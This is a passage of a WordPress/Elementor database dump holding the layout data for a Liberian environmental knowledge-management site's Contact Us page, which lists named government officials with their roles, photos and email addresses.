},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jeremiah Sokan Sr<\\/strong><br \\/>Coordinator Climate Change Secretariat, EPA<br \\/><a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager - Compliance and Enforcement, EPA<br \\/>jjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Kawusu Toure<\\/strong><br \\/>Assistant Manager - Compliance and Enforcement, ESIA, EPA<br \\/>kawumtoure@gmail.com<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely<\\/strong><br \\/>EIA Manager, FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/aw2.jpg\",\"id\":3171},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23137,3346,'_elementor_edit_mode','builder'),(23138,3346,'_elementor_template_type','wp-page'),(23139,3346,'_elementor_version','3.0.16'),(23140,3346,'_wp_page_template','default'),(23141,3346,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/IMG_20200908_105852_513.jpg\",\"id\":3167},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer\\/UNCBD Focal Point<br 